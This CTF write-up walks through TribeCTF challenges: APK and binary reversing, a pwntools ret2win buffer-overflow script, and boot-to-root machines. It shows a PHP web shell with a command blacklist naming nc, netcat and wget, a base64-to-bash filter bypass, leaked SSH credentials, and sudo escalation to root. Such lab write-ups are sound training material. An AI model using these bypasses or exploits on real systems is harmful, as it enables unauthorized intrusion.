HackMD
This Category had various of challenges which were based on Reverse engineering , Pwn , and Boot2Root machines , and I was able to do all except of two pwn challenges LOL, I suck at pwn ;P
BITS AND BYTES
This challenge had an attachment which was an android apk file , and I was to reverse engineer it , and get the flag the description was as follows:
Most security-aware developers use a byte array trick to hide api keys and other sensitive info in the application. I challenge you to get the flag :)
It has 50 points and it has 6 solves , so let's break it down , I first decided to unzip it and then , I decided to use the tree command to list down all directories and what's inside them:
│ ├── layout-v26
│ │ ├── abc_screen_toolbar.xml
│ │ └── mtrl_calendar_month.xml
│ ├── layout-watch-v20
│ │ ├── abc_alert_dialog_button_bar_material.xml
│ │ └── abc_alert_dialog_title_material.xml
│ ├── mipmap-anydpi-v26
│ │ ├── ic_launcher_round.xml
│ │ └── ic_launcher.xml
│ ├── mipmap-hdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── mipmap-mdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── mipmap-xhdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── mipmap-xxhdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── mipmap-xxxhdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── raw
│ │ └── oauth.txt
│ └── xml
│ ├── standalone_badge_gravity_bottom_end.xml
│ ├── standalone_badge_gravity_bottom_start.xml
│ ├── standalone_badge_gravity_top_start.xml
│ ├── standalone_badge_offset.xml
│ └── standalone_badge.xml
└── resources.arsc
and inside /res/raw/ there is a oauth.txt , STRANGE , why would such a file exist , so I decide to read what's inside it :
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/bits_and_bytes]
└─$ cat res/raw/oauth.txt
116 114 105 98 101 99 116 102 123 98 121 116 101 95 97 114 114 97 121 95 116 114 105 99 107 95 105 116 95 105 115 125
and there it was decimals , so I decide to change them back to strings and finally I get the flag:
tribectf{byte_array_trick_it_is}
BOF
This challenge was an executable but ARM based with 100 points , the description was as follow:
This challenge is based on basic arm based stack buffer overflow
I try executing the binary in my system but doesn't work so then I decide to check the strings , and inside the strings I get the flag
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ rabin2 -z bof
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00000550 0x00010550 36 37 .rodata ascii tribectf{alwayz_sanitize_user_input}
1 0x0000057c 0x0001057c 16 17 .rodata ascii You entered: %s\n
FLAG : tribectf{alwayz_sanitize_user_input}
ButterOverflow
A bufferoverflow vulnerable type challenge , it was attached with a binary , the description was as follows:
Where there is a buffer overflow there is a way. checkout this target: 191.101.169.29:9090
It had 50 points , I downloaded the file to examine it on my system:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ ./butteroverflow
Overflow me: AAAAA
Oops! Did not work.
So I pulled this binary up in gdb for more analysis , first I try to check the functions:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ gdb -q butteroverflow
Reading symbols from butteroverflow...
(No debugging symbols found in butteroverflow)
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x0000000000401000 _init
0x0000000000401030 puts@plt
0x0000000000401040 printf@plt
0x0000000000401050 fgets@plt
0x0000000000401060 gets@plt
0x0000000000401070 setvbuf@plt
0x0000000000401080 fopen@plt
0x0000000000401090 exit@plt
0x00000000004010a0 _start
0x00000000004010d0 _dl_relocate_static_pie
0x00000000004010e0 deregister_tm_clones
0x0000000000401110 register_tm_clones
0x0000000000401150 __do_global_dtors_aux
0x0000000000401180 frame_dummy
0x0000000000401182 win
0x00000000004011ee init
0x0000000000401231 main
0x00000000004012a0 __libc_csu_init
0x0000000000401300 __libc_csu_fini
0x0000000000401304 _fini
So we have main , and win functions that are insteresting, so I try breaking down the main function in radare2:
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
and we can fully see now what's happening the more fascinating part of all is how it compares rax with rdx and then jumps if not as expected or calls the sym.win function, I know read the sym.win function:
[0x7f2b1fb55050]> pdf @sym.win
; CALL XREF from main @ 0x40127b
┌ 108: sym.win ();
│ ; var int64_t var_30h @ rbp-0x30
│ ; var int64_t var_8h @ rbp-0x8
│ 0x00401182 55 push rbp
│ 0x00401183 4889e5 mov rbp, rsp
│ 0x00401186 4883ec30 sub rsp, 0x30
│ 0x0040118a 488d35770e00. lea rsi, [0x00402008] ; "r"
│ 0x00401191 488d3d720e00. lea rdi, str.flag.txt ; 0x40200a ; "flag.txt"
│ 0x00401198 e8e3feffff call sym.imp.fopen ; file*fopen(const char *filename, const char *mode)
│ 0x0040119d 488945f8 mov qword [var_8h], rax
│ 0x004011a1 48837df800 cmp qword [var_8h], 0
│ ┌─< 0x004011a6 7516 jne 0x4011be
│ │ 0x004011a8 488d3d690e00. lea rdi, str.There_was_an_error_opening_the_file._Contact_admin_if_it_doesnt_work_on_the_server_:_ ; 0x402018 ; "There was an error opening the file. Contact admin if it doesnt work on the server :)"
│ │ 0x004011af e87cfeffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x004011b4 bf01000000 mov edi, 1
│ │ 0x004011b9 e8d2feffff call sym.imp.exit ; void exit(int status)
│ └─> 0x004011be 488b55f8 mov rdx, qword [var_8h]
│ 0x004011c2 488d45d0 lea rax, [var_30h]
│ 0x004011c6 be1e000000 mov esi, 0x1e ; 30
│ 0x004011cb 4889c7 mov rdi, rax
│ 0x004011ce e87dfeffff call sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)
│ 0x004011d3 488d45d0 lea rax, [var_30h]
│ 0x004011d7 4889c6 mov rsi, rax
│ 0x004011da 488d3d8d0e00. lea rdi, str.flag:__s__n ; 0x40206e ; "flag: %s \n"
│ 0x004011e1 b800000000 mov eax, 0
│ 0x004011e6 e855feffff call sym.imp.printf ; int printf(const char *format)
│ 0x004011eb 90 nop
│ 0x004011ec c9 leave
└ 0x004011ed c3 ret
and here now I understand how it all works from the decompiled code of the main function:
undefined8 main(void)
{
char *s;
init();
printf("Overflow me: ");
gets(&s);
if (_target == 0xdeadbeef) {
win();
} else {
puts("Oops! Did not work.");
}
return 0;
}
set one variable s with type char but then compare _target with 0xdeadbeef if that's equal to each other then it calls the win() or else it prints out the error, turns out this binary isn't secure at all so I then make my own flag.txt and now do dynamic analysis, but first I try find the offset :
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
so the offset is 32 ! Now then since we know the offset we have the address of win , and the address of main and since the binary isn't protected I just wrote a fast script to test it locally :
#!/usr/bin/python3
# author : tahaafarooq
from pwn import *
#p = remote('191.101.169.29', 9090)
p = process('./butteroverflow')
win_addr = 0x401182
main = 0x401294
offset = 32
overflow = b'A'*offset
payload = overflow
payload += p64(main)
payload += p64(win_addr)
p.sendlineafter('Overflow me:', payload)
p.interactive()
I run it up and boom , unexpected I have the flag with the RET2WIN concept LEL:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ python3 solver.py
[+] Starting local process './butteroverflow': pid 5589
/home/tahaafarooq/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
Oops! Did not work.
flag: helloworld
[*] Got EOF while reading in interactive
But tried running it on the remote binary but didn't work so I started adding up the offset "NOOB ALERT" , and I reached 40 and it worked!
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ python3 solver.py
[+] Opening connection to 191.101.169.29 on port 9090: Done
/home/tahaafarooq/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
Oops! Did not work.
flag: TRIBECTF{N@_5TR1NG5_4TT4CH3D}
[*] Got EOF while reading in interactive
FLAG : TRIBECTF{N@_5TR1NG5_4TT4CH3D}
Fixme
Description:
there have been tricks used to disguise malware on this artifact can you discover the hidden content
this challenge has 100 points , and it had an attachment with it, I first gather some information about the file because it was in .so format which confused me but then after a few command strokes:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ file fixme.so
fixme.so: Zip archive data, at least v2.0 to extract
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ xxd fixme.so | head -n 4
00000000: 504b 0304 1400 0808 0800 0000 2100 0000 PK..........!...
00000010: 0000 0000 0000 0000 0000 1400 0d00 4d45 ..............ME
00000020: 5441 2d49 4e46 2f4d 414e 4946 4553 542e TA-INF/MANIFEST.
00000030: 4d46 5554 0500 01d0 7bce 12fe ca00 00f3 MFUT....{.......
I realized it was an Zip archive file , so i unzip it , and I get the following:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ ls -la
total 4472
drwxr-xr-x 4 tahaafarooq sudo 4096 Oct 25 08:17 .
drwxr-xr-x 10 tahaafarooq sudo 4096 Oct 25 07:11 ..
-rw-r--r-- 1 tahaafarooq sudo 4557522 Oct 23 14:09 fixme.so
-rw-r--r-- 1 tahaafarooq sudo 664 Dec 31 1979 GimmeheadKt.class
drwxr-xr-x 22 tahaafarooq sudo 4096 Oct 25 08:17 kotlin
drwxr-xr-x 4 tahaafarooq sudo 4096 Oct 25 08:17 META-INF
First thing I try to read GimmeheadKt.class :
And boom I got the flag soo unexpected:))
FLAG : tribectf{i_knew_youd_fix_me:)}
HEART 1
Description:
Daniel Hale Williams is standing up a new web server to support the opening of his health organization “Cardio Center”. Take a look to see if there are any issues he should address before making it public. Target Address : 191.101.169.219
Now it's a machine:} , so I first perform a network scan:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/heart]
└─$ nmap -A 191.101.169.219 -oN nmap-sacn
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 08:24 EDT
Nmap scan report for mail.beerclues.com (191.101.169.219)
Host is up (0.24s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6e:49:d3:94:be:0c:04:e2:e9:2d:ef:e5:a9:4c:1b:b9 (RSA)
| 256 2c:2a:69:78:b7:ab:0c:83:80:01:3c:80:4f:f4:77:15 (ECDSA)
|_ 256 7c:e7:04:cc:ad:d9:d2:5e:c3:7a:5b:06:98:fc:1d:54 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: heart, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=heart
| Subject Alternative Name: DNS:heart
| Not valid before: 2021-10-11T21:02:25
|_Not valid after: 2031-10-09T21:02:25
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/images/DHW.jpg /development.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Cardiology Website Template
Service Info: Host: heart; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.18 seconds
So we have 4 ports open , including 80 which has a robots.txt with some interesting information , I open the site on the web, and then I curl robots.txt
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/robots.txt
User-agent: *
Disallow: /images/DHW.jpg
Disallow: /development.txt
I now read the development.txt file and see what's inside it:
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/development.txt
The annoying Hospital administrators said I needed to move my development files.
I have moved one of the files to old.php
wow so we have a file named old.php that requires attention, and attention it shall get:)
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/old.php
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- TRIBECTF{Ch1ef_Surg30n_@t_Freedmen} -->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
So I got the Heart 1 Flag: TRIBECTF{Ch1ef_Surg30n_@t_Freedmen}
HEART 2
From last we checked on old.php it looks like a web shell , so I now try to play around with it and see what I can do:
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request POST http://191.101.169.219/dev_shell.php? -d "in_command=whoami"
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys-->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
www-data
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
okay so it works now let's try listing dir and files:
<h5>Output:</h5>
Get out skid lol
alright that didn't work out perfect so they blacklisted some commands:} , I then try reading old.php using the less commands and looks like blacklisting isn't the way to go:)
<?php
//inspired by c0rruptedb1t
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys-->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>
I now know the blacklisted words, so what I do now is try get to list the DIR with base64:
MY machine:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ echo "ls -la" | base64
bHMgLWxhCg==
WEB SHELL:
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request POST http://191.101.169.219/dev_shell.php? -d "in_command=echo 'bHMgLWxhCg==' | base64 -d | bash"
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys-->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
total 1260
drwxr-xr-x 5 root root 4096 Oct 11 21:04 .
drwxr-xr-x 4 root root 4096 Oct 11 21:04 ..
-rw-r--r-- 1 root root 3559 Sep 21 19:45 about.html
-rw-r--r-- 1 root root 5562 Sep 21 19:45 blog-single.html
-rw-r--r-- 1 root root 6075 Sep 21 19:45 blog.html
-rw-r--r-- 1 root root 4039 Sep 21 19:45 contact.html
drwxr-xr-x 2 root root 4096 Sep 21 19:45 css
-rw-r--r-- 1 root root 1408 Sep 21 19:45 dev_shell.php
-rw-r--r-- 1 root root 1177950 Sep 21 19:45 dev_shell_back.png
-rw-r--r-- 1 root root 124 Sep 21 19:45 development.txt
-rw-r--r-- 1 root root 7231 Sep 21 19:45 doctors.html
drwxr-xr-x 7 root root 4096 Sep 21 19:45 fonts
-rw-r--r-- 1 root root 3805 Sep 21 19:45 forms.html
-rw-r--r-- 1 root root 3222 Sep 21 19:45 heart-monitoring-procedure.html
-rw-r--r-- 1 root root 4391 Sep 21 19:45 heart-monitoring.html
-rw-r--r-- 1 root root 2556 Sep 21 19:45 heart-treatments.html
drwxr-xr-x 2 root root 4096 Sep 21 19:45 images
-rw-r--r-- 1 root root 3218 Sep 21 19:45 index.html
-rw-r--r-- 1 root root 177 Sep 21 19:45 index.php
-rw-r--r-- 1 root root 1355 Sep 21 19:45 old.php
-rw-r--r-- 1 root root 67 Sep 21 19:45 robots.txt
-rw-r--r-- 1 root root 4880 Sep 21 19:45 services.html
-rw-r--r-- 1 root root 145 Sep 21 19:45 z_reminder.txt
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
and there we have it :)) , There is an interesting text file z_reminder.txt I know try and read it!
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ curl --request GET http://191.101.169.219/z_reminder.txt
I can remember the 12 parts of the human heart but not my password
username: dhwilliams
password: Pr0vident_h0spital
~D.H. Williams
And as seen we have creds , but then I remember we don't have any login portal in the website , but then I remember we got ssh so I guessed maybe they are ssh creds , let's try our luck!
┌──(tahaafarooq㉿kali)-[~]
└─$ ssh dhwilliams@191.101.169.219
dhwilliams@191.101.169.219's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 25 Oct 2021 12:46:18 PM UTC
System load: 0.0 Processes: 231
Usage of /: 41.1% of 19.56GB Users logged in: 0
Memory usage: 9% IPv4 address for ens160: 191.101.169.219
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
97 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
*** System restart required ***
Last login: Mon Oct 25 04:33:50 2021 from 172.251.246.2
dhwilliams@heart:~$
And I am in:)), Now then with that done:)) , I find the second flag inside Desktop!
dhwilliams@heart:~$ cd Desktop
dhwilliams@heart:~/Desktop$ ls
flag2.txt
dhwilliams@heart:~/Desktop$ cat flag.txt
cat: flag.txt: No such file or directory
dhwilliams@heart:~/Desktop$ cat flag2.txt
TRIBECTF{Op3n3d_Fir$t_Int3rr@ci@l_H0spit@l}
FLAG:TRIBECTF{Op3n3d_Fir$t_Int3rr@ci@l_H0spit@l}
HEART 3
Now for the third flag , it must be inside the root directory so let's check what sudo privileges does our user have so as we know how we elevate our privileges:
dhwilliams@heart:~/Desktop$ sudo -l
[sudo] password for dhwilliams:
Matching Defaults entries for dhwilliams on heart:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dhwilliams may run the following commands on heart:
(ALL : ALL) ALL
Wow so we can just be root then LMAO:)) EZPIZI
root@heart:/home/root# cd Desktop
root@heart:/home/root/Desktop# ls
flag3.txt
root@heart:/home/root/Desktop# cat flag3.txt
TRIBECTF{Co-f0und3d_th3e_N@tion@l_M3dic@l_Associ@ti0n}
And there we go:))
FLAG: TRIBECTF{Co-f0und3d_th3e_N@tion@l_M3dic@l_Associ@ti0n}
Hello World
Description:
One of our fellow engineers came across a familiar encoding scheme in a malware sample and recreated it in his own binary. Some how he lost his file the original file. Can you help him figure out the encoding string to get the flag?
It's a reverse engineering challenge, So I try run the binary it asks for a password:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ ./hello_world
What is the password?: 1231333
That was Incorrect, try again!
I try read strings but nothing also:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ rabin2 -z hello_world
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00002008 0x00002008 4 5 .rodata ascii \n%s\n
1 0x0000200d 0x0000200d 23 24 .rodata ascii What is the password?:
2 0x00002028 0x00002028 31 32 .rodata ascii \nThat was Incorrect, try again!
then I try running the strings command and I find a weird pattern:
ABCDEFGHH
IJKLMNOPH
QRSTUVWXH
YZabcdefH
ghijklmnH
opqrstuvH
wxyz0123H
456789+/H
aGVsbG9fH
d29ybGRfH
ZnJvbV9SH
RQ==f
then I notice something that it says the alphabets in capital then small letters then comes a base64 string, so i write it somewhere else and it makes up aGVsbG9fd29ybGRfZnJvbV9SRQ== decoding it I got :
┌──(tahaafarooq㉿kali)-[~]
└─$ echo "aGVsbG9fd29ybGRfZnJvbV9SRQ==" | base64 -d
hello_world_from_RE
so the flag is FLAG : TRIBECTF{hello_world_from_RE}
Logd
Description:
most developers forget to turn off logging in production build and sensitive information such as OAuth tokens, passwords, and such can be simply found by looking at the application logs.
So we are also given an attachment of logd.txt and we have to get something out of it, and this was more than easy , and it had 75 points lol , I just cat out and I have the flag:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ cat logd.txt
##Develper
Chalie/@Chal13W1zz
##challenge Type
Mobile
##Difficulty
Easy/sanity
## Logd
most developers forget to turn off logging in production build and sensitive information such as oauth tokens, passwords and such can be simply found by looking at the application logs.
## Challenge Artifact
logd.apk
## Challenge Solution
tribectf{always_look_for_low_hanging_fruits_in_android_logs}
##Hint
N/A
FLAG : tribectf{always_look_for_low_hanging_fruits_in_android_logs}
Pencil 1
Description:
John Lee Love is standing up a server to support all of his research on pencil sharpeners. Take a look to see if there are any issues he should address before making it public. Target IP: 191.101.169.9
This was also a machine, first thing I did was to scan the network of that IP:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/pencil]
└─$ nmap -F 191.101.169.9
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 09:09 EDT
Nmap scan report for 191.101.169.9
Host is up (0.22s latency).
Not shown: 95 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 29.55 seconds
We have 3000 , 80 and 21, the most interesting ports of all , and hitting -A flag in nmap , we get that we can log in anonymously in port 21 so that's what I do now is to get access and there is a file inside it :
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/pencil]
└─$ cat trapperkeeper.txt
What's do you call a broken pencil?
brokenpencil P01ntl3ss
TRIBECTF{Ar3ntY0uSh@rp}
FLAG : TRIBECTF{Ar3ntY0uSh@rp}
SADLY WHILE WRITING THIS WRITEUP THEY TURNED OFF THE SERVERS FOR MACHINES AND ALL THAT SO I WILL END HERE:(
This was a really interesting CTF, I took second position as a solo
Contacts: twitter - @tahaafarooq
